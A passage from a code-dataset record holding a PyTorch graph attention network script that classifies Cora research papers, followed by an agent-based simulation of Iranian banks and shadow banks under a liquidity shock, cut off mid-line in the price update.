\"\"\"\n content [\n ['31336' '0' '0' ... '0' '0' 'Neural_Networks'],\n ['1061127' '0' '0' ... '0' '0' 'Rule_Learning'],\n ...\n ]\n citations [\n [35 1033]\n [35 103482]\n ...\n ]\n \"\"\"\n\n labels: torch.Tensor\n classes: Dict[str, int]\n features: torch.Tensor\n adj_mat: torch.Tensor\n\n @staticmethod\n def _download():\n data_dir = \"./data/\"\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n url = \"https://linqs-data.soe.ucsc.edu/public/lbc/cora.tgz\"\n filename = \"cora.tgz\"\n urllib.request.urlretrieve(url, os.path.join(data_dir, filename))\n with tarfile.open(os.path.join(data_dir, filename), \"r:gz\") as tar:\n tar.extractall(data_dir)\n\n def __init__(self, include_edges: bool = True):\n self.include_edges = include_edges\n self._download()\n content = np.genfromtxt(\"./data/cora/cora.content\", dtype=np.dtype(str))\n citations = np.genfromtxt(\"./data/cora/cora.cites\", dtype=np.int32)\n features = torch.Tensor(np.array(content[:, 1:-1], dtype=np.float32))\n self.features = features / features.sum(dim=1, keepdim=True)\n self.classes = {s: i for i, s in enumerate(set(content[:, -1]))}\n self.labels = torch.tensor(\n [self.classes[i] for i in content[:, -1]], dtype=torch.long\n )\n paper_ids = np.array(content[:, 0], dtype=np.int32)\n ids_to_idx = {id_: i for i, id_ in enumerate(paper_ids)}\n self.adj_mat = torch.eye(len(self.labels), dtype=torch.bool)\n\n if self.include_edges:\n for e in citations:\n e1, e2 = ids_to_idx[e[0]], ids_to_idx[e[1]]\n self.adj_mat[e1][e2] = True\n self.adj_mat[e2][e1] = True\n\n\nclass GAT(nn.Module):\n def __init__(\n self,\n in_features: int,\n n_hidden: int,\n n_classes: int,\n n_heads: int,\n dropout: float,\n ):\n super().__init__()\n self.layer1 = GraphAttentionLayer(\n in_features, n_hidden, n_heads, is_concat=True, dropout=dropout\n )\n self.activation = nn.ELU()\n self.output = GraphAttentionLayer(\n n_hidden, n_classes, 1, is_concat=True, dropout=dropout\n )\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, adj_mat):\n x = self.dropout(x)\n x = self.layer1(x, adj_mat)\n x = self.activation(x)\n x = self.dropout(x)\n return self.output(x, adj_mat)\n\n\ndef accuracy(output: torch.Tensor, labels: torch.Tensor):\n return output.argmax(dim=-1).eq(labels).sum().item() / len(labels)\n\n\ndef main():\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n dataset = CoraDataset(include_edges=True)\n in_features = dataset.features.shape[1]\n n_hidden = 64\n n_classes = len(dataset.classes)\n n_heads = 8\n dropout = 0.6\n model = GAT(in_features, n_hidden, n_classes, n_heads, dropout).to(device)\n epochs = 1000\n optimizer = torch.optim.Adam(model.parameters(), lr=5e-3)\n loss_func = nn.CrossEntropyLoss()\n\n features = dataset.features.to(device)\n labels = dataset.labels.to(device)\n edges_adj = dataset.adj_mat.to(device)\n edges_adj = edges_adj.unsqueeze(-1) # add a third dim for heads\n\n idx_rand = torch.randperm(len(labels))\n idx_train = idx_rand[:500]\n idx_valid = idx_rand[500:]\n\n for epoch in range(epochs):\n model.train()\n optimizer.zero_grad()\n output = model(features, edges_adj)\n loss = loss_func(output[idx_train], labels[idx_train])\n loss.backward()\n optimizer.step()\n train_accuracy = accuracy(output[idx_train], labels[idx_train])\n\n model.eval()\n with torch.no_grad():\n output = model(features, edges_adj)\n val_loss = loss_func(output[idx_valid], labels[idx_valid])\n val_accuracy = accuracy(output[idx_valid], labels[idx_valid])\n\n print(\n f\"epoch {epoch + 1} / {epochs}, train loss: {loss}, 
train accuracy: {train_accuracy}, valid loss: {val_loss}, valid accuracy: {val_accuracy}\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "akashsonowal/ml-foundations", "sub_path": "ml_foundations/pipelines/tabular/graph_learning/research_paper_classification.py", "file_name": "research_paper_classification.py", "file_ext": "py", "file_size_in_byte": 4491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.Tensor", "line_number": 27, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 39, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 39, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.genfromtxt", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.eye", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.bool", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "ml_foundations.models.deep_models.layers.GraphAttentionLayer", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.ELU", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "ml_foundations.models.deep_models.layers.GraphAttentionLayer", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 106, "usage_type": "call"}, {"api_name": 
"torch.optim", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.randperm", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "12633691501", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy as spy\nfrom scipy.stats import norm\nfrom scipy.optimize import linprog\nimport math\n\n##################################################################################\n\n### global variables\nn_sim = 30\netha = 1\nret_sec_bank = 0.18\nret_sec_bank_sigma = 0.03\nret_sec_shbank = 0.18\nrfree = 0.18\nrfree_min = 0.20\nrfree_max = 0.25\nrfree_vector = [f'{rfree}']\nintrinsic_value = 100\np_market = intrinsic_value + np.random.normal(0)\np_market_old = p_market\np_market_max = 150\np_market_min = 80\np_market_vector = [f'{p_market}']\nret_sec_bank_vector = [f'{ret_sec_bank}']\n\nevery = 0\nevery_thing_vector = [f'{every}']\n\nevery1 = 0\nevery1_thing_vector = [f'{every1}']\n\nevery2 = p_market\nevery2_thing_vector = [f'{every2}']\n\n\n########################################################################\n# defining the agents: banks, shadow banks\n\n\nclass Bank:\n def __init__(self, bank_cash, lend_to_banks, lend_to_loans, bank_sec, deposits, borrow_from_banks, equity,\n alpha_min, provision_per, phi, zeta, car, xs, xbl, xl, etha_max):\n self.bankrupt = False\n self.bank_cash = bank_cash\n self.lend_to_banks = lend_to_banks\n self.lend_to_loans = lend_to_loans\n self.bank_sec = bank_sec\n self.deposits = deposits\n self.borrow_from_banks = borrow_from_banks\n self.equity = equity\n\n self.alpha_min = alpha_min\n self.provision_per = provision_per\n self.zeta = zeta\n self.total_assets = bank_cash + lend_to_banks + lend_to_loans + bank_sec\n self.xs = xs\n self.xbl = xbl\n self.xl = xl\n self.car = car\n self.ret_on_sec = np.random.normal(ret_sec_bank, ret_sec_bank_sigma)\n self.stock = bank_sec / p_market\n self.security_sale = 0\n self.supply_of_stock_b = 0\n self.demand_of_stock_b = 0\n\n ##### income and expense of bank\n self.phi = phi\n self.sigma = phi * (self.deposits + self.equity)\n # self.profit = float(np.random.normal(self.net_income, self.sigma, 1))\n # self.pd = float(norm.ppf((-self.net_income - self.equity) / (self.sigma)))\n self.pd = np.random.beta(1, 20)\n self.etha_max = etha_max\n\n\nclass Shadow_Bank:\n def __init__(self, participation, shadow_bank_cash, security, s_alpha, s_provision):\n self.exit = False\n self.participation = participation\n self.shadow_bank_cash = shadow_bank_cash\n self.security = security\n self.s_alpha = s_alpha\n self.s_provision = s_provision\n self.int_value = np.random.normal(intrinsic_value)\n self.redemption = 0\n self.stock = security / p_market\n\n ##### income and expense of shadow bank\n\n\n###############################################################\n# introduction of Iranian Banks\n\nbank_melli = Bank(2.9, 22.9, 66.3, 33.5, 102.3, 20.2, 3.2, 0.1, 0.1, 0.1, 0.4, 0.07, 0.05, 0.05, 0.05, 1)\nbank_seppah = Bank(0.8, 6, 17.4, 8.8, 14.7, 6.3, 12.1, 0.1, 0.1, 0.1, 0.4, 0.07, 0.05, 0.05, 0.05, 1)\nbank_tosesaderat = Bank(8.3, 3.2, 22.8, 21.5, 5.7, 8.2, 42, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_maskan = Bank(3.4, 0, 54.2, 9.3, 6.9, 9.8, 50.3, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_sanatmadan = Bank(6.7, 0, 106, 18.3, 8.9, 42.7, 79.3, 0.1, 0.1, 0.1, 
0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_keshavarzi = Bank(25.3, 3.2, 88, 47.4, 33.6, 2.1, 128.2, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_tosetavon = Bank(1.3, 0.2, 16.9, 4.4, 5.6, 2.3, 14.8, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_post = Bank(0.6, 4.4, 11.1, 1.3, 13.3, 4, 0.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_eghtesadnovin = Bank(4, 6.2, 44, 10.9, 51.1, 7.3, 6.7, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_parsian = Bank(9.5, 27.6, 94.6, 26.4, 33.3, 11.3, 113.5, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_karafarin = Bank(4.8, 7.5, 52.8, 13, 61.3, 8.7, 8.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_saman = Bank(0.5, 14.1, 22.6, 18, 46.3, 4.9, 4, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_sina = Bank(2, 2.6, 16, 3.8, 21.6, 0.2, 2.6, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_khavarmiane = Bank(0.2, 5.2, 11.8, 4, 12.7, 5.3, 3.2, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_shahr = Bank(0.8, 9.9, 43.7, 21.4, 85.8, 5.1, -15.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_dey = Bank(1, 3.2, 8.2, 15.1, 27.8, 8.4, -8.7, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_saderat = Bank(16.3, 45.5, 204.3, 60.4, 231.3, 41.6, 53.6, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_tejarat = Bank(13.1, 46.4, 133.8, 51.6, 197.6, 22.3, 25, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_mellat = Bank(21.2, 50.8, 311.3, 68.4, 269.6, 127.1, 55, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_refah = Bank(2.4, 3.1, 19.1, 4.5, 25.9, 0.2, 3.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_ayandeh = Bank(1.5, 21.8, 97.6, 79.3, 186.1, 22.8, -8.7, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_gardeshgary = Bank(1, 0.2, 19.8, 29.7, 38.4, 8.4, 3.8, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_iranzamin = Bank(0.3, 4.1, 3.5, 29.2, 33.6, 6.1, -2.6, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_sarmaye = Bank(0.5, 2.7, 5.4, 5.4, 18.3, 21.7, -26.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 0)\nbank_pasargad = Bank(18.7, 21.6, 79.9, 45.8, 116.9, 19.3, 29.9, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_melal = Bank(0.2, 2.3, 10.8, 21.1, 15.2, 15, 4, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\n\n# introduction of Iranian Shadow Banks\n\nshadow1 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.01, 0.01)\nshadow2 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.3, 0.3)\nshadow3 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.91, 0.01)\nshadow4 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow5 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow6 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow7 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow8 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow9 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow10 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow11 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow12 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow13 = 
Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow14 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow15 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\n\n\n#####################################################\n\n#####################################################\n# 1-BL 2-S 3-BB 4-L 5-C\n# optimization phase\n### objective function of banks\n\ndef optimize_bank(mmm):\n    if mmm.bankrupt == False:\n        c = np.array([-rfree, -mmm.ret_on_sec, ((rfree * mmm.borrow_from_banks) / (1 - mmm.zeta * mmm.pd)), 0, 0])\n        A_ub = np.array([[(-1 + mmm.car * mmm.xbl), (-1 + mmm.car * mmm.xs), 1, (-1 + mmm.car * mmm.xl), -1],\n                         [-1, 0, (mmm.alpha_min + mmm.provision_per), 0, -1], [0, 0, 0, 0, -1], [0, 1, 0, 0, 0]])\n        b_ub = np.array([-mmm.deposits, -(mmm.alpha_min + mmm.provision_per) * mmm.deposits,\n                         -(mmm.alpha_min + mmm.provision_per) * mmm.deposits, mmm.etha_max * mmm.total_assets])\n        A_eq = np.array([[1, 1, -1, 1, 1], [0, 0, -1, 2, 0]])\n        b_eq = np.array([mmm.deposits + mmm.equity, mmm.deposits + mmm.equity])\n        x0_bounds = (0, None)\n        x1_bounds = (0, None)\n        x2_bounds = (0, None)\n        x3_bounds = (0, None)\n        x4_bounds = (0, None)\n        bounds = [x0_bounds, x1_bounds, x2_bounds, x3_bounds, x4_bounds]\n        result = linprog(c, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq, bounds=bounds)\n        mmm.bank_cash = result.x[4]\n        mmm.lend_to_banks = result.x[0]\n        mmm.lend_to_loans = result.x[3]\n        bank_sec_old = mmm.bank_sec\n        mmm.bank_sec = result.x[1]\n        mmm.borrow_from_banks = result.x[2]\n        mmm.ret_on_sec = float(np.random.normal(ret_sec_bank, ret_sec_bank_sigma))\n        mmm.net_income = (mmm.ret_on_sec * mmm.bank_sec) + (rfree * mmm.lend_to_banks) - (\n                (rfree * mmm.borrow_from_banks) / (1 - mmm.zeta * mmm.pd))\n        mmm.sigma = abs(mmm.phi * (mmm.deposits + mmm.equity))\n        mmm.profit = float(np.random.normal(mmm.net_income, mmm.sigma, 1))\n\n        mmm.security_sale = bank_sec_old - mmm.bank_sec\n        if mmm.security_sale > 0:\n            mmm.demand_of_stock_b = 0\n            mmm.supply_of_stock_b = mmm.security_sale\n        elif mmm.security_sale < 0:\n            mmm.demand_of_stock_b = abs(mmm.security_sale)\n            mmm.supply_of_stock_b = 0\n        else:\n            mmm.demand_of_stock_b = 0\n            mmm.supply_of_stock_b = 0\n\n        # note: this rebinding is local to the function; the caller's bank is updated via the attribute assignments above\n        mmm = Bank(result.x[4], result.x[0], result.x[3], result.x[1], result.x[2], mmm.deposits, mmm.equity,\n                   mmm.alpha_min, mmm.provision_per, mmm.phi, mmm.zeta, mmm.car, mmm.xs, mmm.xbl, mmm.xl, mmm.etha_max)\n    else:\n        mmm = Bank(0, 0, 0, 0, 0, 0, 0, mmm.alpha_min, mmm.provision_per, mmm.phi, mmm.zeta, mmm.car, mmm.xs, mmm.xbl,\n                   mmm.xl, mmm.etha_max)\n\n    ########################################################\n    # optimization phase\n    ### objective function of shadow banks\n    # 1- security 2-cash\n\n\ndef optimize_shadow_bank(nnn):\n    c_s = np.array([np.random.normal(-ret_sec_shbank, 0.01), 0])\n    A_ub_s = np.array([[0, -1]])\n    b_ub_s = np.array([-(nnn.s_alpha + nnn.s_provision) * nnn.participation])\n    A_eq_s = np.array([[1, 1]])\n    b_eq_s = np.array([nnn.participation])\n    x0_bounds_s = (0, None)\n    x1_bounds_s = (0, None)\n\n    bounds_s = [x0_bounds_s, x1_bounds_s]\n    result_s = linprog(c_s, A_ub=A_ub_s, b_ub=b_ub_s, A_eq=A_eq_s, b_eq=b_eq_s, bounds=bounds_s)\n    nnn.shadow_bank_cash = result_s.x[1]\n    nnn.security_old = nnn.security\n    nnn.security = result_s.x[0]\n\n    nnn.security_sale = nnn.security_old - nnn.security\n    if nnn.security_sale > 0:\n        nnn.demand_of_stock = 0\n        nnn.supply_of_stock = nnn.security_sale\n    elif 
nnn.security_sale < 0:\n        nnn.demand_of_stock = abs(nnn.security_sale)\n        nnn.supply_of_stock = 0\n    else:\n        nnn.demand_of_stock = 0\n        nnn.supply_of_stock = 0\n\n    # note: this rebinding is local to the function; the caller's shadow bank is updated via the attribute assignments above\n    nnn = Shadow_Bank((result_s.x[0] + result_s.x[1]), result_s.x[1], result_s.x[0], nnn.s_alpha, nnn.s_provision)\n\n\n######################################################################################################\n\ndef redemption(www):\n    p_change = 1 - (p_market / p_market_old)\n    if p_change < 0:\n        www.redemption = 0\n    else:\n        www.redemption = www.participation * ((math.exp(etha * p_change) - 1))\n\n    if www.redemption < www.shadow_bank_cash:\n        www.shadow_bank_cash = www.shadow_bank_cash - www.redemption\n        www.participation = www.participation - www.redemption\n\n    elif www.shadow_bank_cash < www.redemption < www.security + www.shadow_bank_cash:\n        # use cash first, then sell securities for the remainder (computed before the cash is zeroed)\n        www.security = www.security + www.shadow_bank_cash - www.redemption\n        www.shadow_bank_cash = 0\n        www.participation = www.participation - www.redemption\n    elif www.security + www.shadow_bank_cash < www.redemption:\n        www.exit = True\n        www.participation = 0\n        www.security = 0\n        www.shadow_bank_cash = 0\n\n\n###############################################################\n##### dynamics of model\n# the name of the bank which is the source of the shock\n\nshock_hit = bank_melli\n\nsig = 0.5\nshock = sig * (shock_hit.deposits + shock_hit.borrow_from_banks)\n\n\ndef dynamic_bank(www):\n    if shock <= www.bank_cash:\n        www.equity = www.equity - shock\n        www.bank_cash = www.bank_cash - shock\n    elif (www.bank_cash + www.lend_to_banks) >= shock >= www.bank_cash:\n        landa = shock - www.bank_cash  # part of the shock that cash cannot absorb\n        www.equity = www.equity - www.bank_cash\n        www.lend_to_banks = www.lend_to_banks - landa\n        www.bank_cash = 0\n    elif (www.bank_cash + www.lend_to_banks + www.bank_sec) >= shock >= (www.bank_cash + www.lend_to_banks):\n        delta = www.bank_cash + www.lend_to_banks + www.bank_sec - shock  # assets remaining after the shock\n        www.equity = www.equity - www.bank_cash\n        www.bank_cash = 0\n        www.lend_to_banks = 0\n        www.bank_sec = delta\n        www.stock = www.bank_sec / p_market\n    elif (www.bank_cash + www.lend_to_banks + www.bank_sec) <= shock:\n        www.bank_cash = 0\n        www.equity = 0\n        www.lend_to_banks = 0\n        www.bank_sec = 0\n        www.borrow_from_banks = 0\n        www.bankrupt = True\n\n\n###############################################################\n################ start the simulation\n################\ndynamic_bank(shock_hit)\nfor ttt in range(n_sim):\n\n    # first banks\n    optimize_bank(bank_melli)\n    optimize_bank(bank_seppah)\n    optimize_bank(bank_tosesaderat)\n    optimize_bank(bank_maskan)\n    optimize_bank(bank_sanatmadan)\n    optimize_bank(bank_keshavarzi)\n    optimize_bank(bank_tosetavon)\n    optimize_bank(bank_post)\n    optimize_bank(bank_eghtesadnovin)\n    optimize_bank(bank_parsian)\n    optimize_bank(bank_karafarin)\n    optimize_bank(bank_saman)\n    optimize_bank(bank_sina)\n    optimize_bank(bank_khavarmiane)\n    optimize_bank(bank_shahr)\n    optimize_bank(bank_dey)\n    optimize_bank(bank_saderat)\n    optimize_bank(bank_tejarat)\n    optimize_bank(bank_mellat)\n    optimize_bank(bank_refah)\n    optimize_bank(bank_ayandeh)\n    optimize_bank(bank_gardeshgary)\n    optimize_bank(bank_iranzamin)\n    optimize_bank(bank_sarmaye)\n    optimize_bank(bank_pasargad)\n    optimize_bank(bank_melal)\n\n    # second, shadow banks determine the redemptions (essentially a legal obligation); only then do they optimize, which is an economic behaviour\n\n    redemption(shadow1)\n    redemption(shadow2)\n    redemption(shadow3)\n    redemption(shadow4)\n    redemption(shadow5)\n    
redemption(shadow6)\n    redemption(shadow7)\n    redemption(shadow8)\n    redemption(shadow9)\n    redemption(shadow10)\n    redemption(shadow11)\n    redemption(shadow12)\n    redemption(shadow13)\n    redemption(shadow14)\n    redemption(shadow15)\n\n    ## optimization of shadow banks\n\n    optimize_shadow_bank(shadow1)\n    optimize_shadow_bank(shadow2)\n    optimize_shadow_bank(shadow3)\n    optimize_shadow_bank(shadow4)\n    optimize_shadow_bank(shadow5)\n    optimize_shadow_bank(shadow6)\n    optimize_shadow_bank(shadow7)\n    optimize_shadow_bank(shadow8)\n    optimize_shadow_bank(shadow9)\n    optimize_shadow_bank(shadow10)\n    optimize_shadow_bank(shadow11)\n    optimize_shadow_bank(shadow12)\n    optimize_shadow_bank(shadow13)\n    optimize_shadow_bank(shadow14)\n    optimize_shadow_bank(shadow15)\n\n    # aggregate interbank demand and supply (each bank enters the sum once)\n    demand_of_banks = bank_melli.borrow_from_banks + bank_seppah.borrow_from_banks + bank_tosesaderat.borrow_from_banks + bank_maskan.borrow_from_banks + bank_sanatmadan.borrow_from_banks + bank_keshavarzi.borrow_from_banks + bank_tosetavon.borrow_from_banks + bank_post.borrow_from_banks + bank_eghtesadnovin.borrow_from_banks + bank_parsian.borrow_from_banks + bank_karafarin.borrow_from_banks + bank_saman.borrow_from_banks + bank_sina.borrow_from_banks + bank_khavarmiane.borrow_from_banks + bank_shahr.borrow_from_banks + bank_dey.borrow_from_banks + bank_saderat.borrow_from_banks + bank_tejarat.borrow_from_banks + bank_mellat.borrow_from_banks + bank_refah.borrow_from_banks + bank_ayandeh.borrow_from_banks + bank_gardeshgary.borrow_from_banks + bank_iranzamin.borrow_from_banks + bank_sarmaye.borrow_from_banks + bank_pasargad.borrow_from_banks + bank_melal.borrow_from_banks\n    supply_of_banks = bank_melli.lend_to_banks + bank_seppah.lend_to_banks + bank_tosesaderat.lend_to_banks + bank_maskan.lend_to_banks + bank_sanatmadan.lend_to_banks + bank_keshavarzi.lend_to_banks + bank_tosetavon.lend_to_banks + bank_post.lend_to_banks + bank_eghtesadnovin.lend_to_banks + bank_parsian.lend_to_banks + bank_karafarin.lend_to_banks + bank_saman.lend_to_banks + bank_sina.lend_to_banks + bank_khavarmiane.lend_to_banks + bank_shahr.lend_to_banks + bank_dey.lend_to_banks + bank_saderat.lend_to_banks + bank_tejarat.lend_to_banks + bank_mellat.lend_to_banks + bank_refah.lend_to_banks + bank_ayandeh.lend_to_banks + bank_gardeshgary.lend_to_banks + bank_iranzamin.lend_to_banks + bank_sarmaye.lend_to_banks + bank_pasargad.lend_to_banks + bank_melal.lend_to_banks\n    difference = demand_of_banks - supply_of_banks\n\n    if demand_of_banks > supply_of_banks:\n        # rrr = (demand_of_banks/supply_of_banks) - 1\n        # rfree = (1+rrr) * rfree\n        rfree = (rfree + rfree_max) / 2\n    elif demand_of_banks < supply_of_banks:\n        # rrr = (supply_of_banks / demand_of_banks) - 1\n        # rfree = (1 - rrr) * rfree\n        rfree = (rfree + rfree_min) / 2\n    else:\n        rfree = rfree\n\n    rfree_vector.append(rfree)\n\n    # aggregate stock demand and supply, again counting each bank once\n    stock_supply_of_banks = bank_melli.supply_of_stock_b + bank_seppah.supply_of_stock_b + bank_tosesaderat.supply_of_stock_b + bank_maskan.supply_of_stock_b + bank_sanatmadan.supply_of_stock_b + bank_keshavarzi.supply_of_stock_b + bank_tosetavon.supply_of_stock_b + bank_post.supply_of_stock_b + bank_eghtesadnovin.supply_of_stock_b + bank_parsian.supply_of_stock_b + bank_karafarin.supply_of_stock_b + bank_saman.supply_of_stock_b + bank_sina.supply_of_stock_b + bank_khavarmiane.supply_of_stock_b + bank_shahr.supply_of_stock_b + bank_dey.supply_of_stock_b + 
bank_saderat.supply_of_stock_b + bank_tejarat.supply_of_stock_b + bank_mellat.supply_of_stock_b + bank_refah.supply_of_stock_b + bank_ayandeh.supply_of_stock_b + bank_gardeshgary.supply_of_stock_b + bank_iranzamin.supply_of_stock_b + bank_sarmaye.supply_of_stock_b + bank_pasargad.supply_of_stock_b + bank_melal.supply_of_stock_b\n    stock_demand_of_banks = bank_melli.demand_of_stock_b + bank_seppah.demand_of_stock_b + bank_tosesaderat.demand_of_stock_b + bank_maskan.demand_of_stock_b + bank_sanatmadan.demand_of_stock_b + bank_keshavarzi.demand_of_stock_b + bank_tosetavon.demand_of_stock_b + bank_post.demand_of_stock_b + bank_eghtesadnovin.demand_of_stock_b + bank_parsian.demand_of_stock_b + bank_karafarin.demand_of_stock_b + bank_saman.demand_of_stock_b + bank_sina.demand_of_stock_b + bank_khavarmiane.demand_of_stock_b + bank_shahr.demand_of_stock_b + bank_dey.demand_of_stock_b + bank_saderat.demand_of_stock_b + bank_tejarat.demand_of_stock_b + bank_mellat.demand_of_stock_b + bank_refah.demand_of_stock_b + bank_ayandeh.demand_of_stock_b + bank_gardeshgary.demand_of_stock_b + bank_iranzamin.demand_of_stock_b + bank_sarmaye.demand_of_stock_b + bank_pasargad.demand_of_stock_b + bank_melal.demand_of_stock_b\n    stock_demand_of_shadow_banks = shadow1.demand_of_stock + shadow2.demand_of_stock + shadow3.demand_of_stock + shadow4.demand_of_stock + shadow5.demand_of_stock + shadow6.demand_of_stock + shadow7.demand_of_stock + shadow8.demand_of_stock + shadow9.demand_of_stock + shadow10.demand_of_stock + shadow11.demand_of_stock + shadow12.demand_of_stock + shadow13.demand_of_stock + shadow14.demand_of_stock + shadow15.demand_of_stock\n    stock_supply_of_shadow_banks = shadow1.supply_of_stock + shadow2.supply_of_stock + shadow3.supply_of_stock + shadow4.supply_of_stock + shadow5.supply_of_stock + shadow6.supply_of_stock + shadow7.supply_of_stock + shadow8.supply_of_stock + shadow9.supply_of_stock + shadow10.supply_of_stock + shadow11.supply_of_stock + shadow12.supply_of_stock + shadow13.supply_of_stock + shadow14.supply_of_stock + shadow15.supply_of_stock\n    total_stock_demand = stock_demand_of_banks + stock_demand_of_shadow_banks\n    total_stock_supply = stock_supply_of_banks + stock_supply_of_shadow_banks\n\n    p_market_old = p_market\n\n    if total_stock_demand > total_stock_supply:\n        p_market = (p_market + p_market_max) / 2\n    elif total_stock_demand < 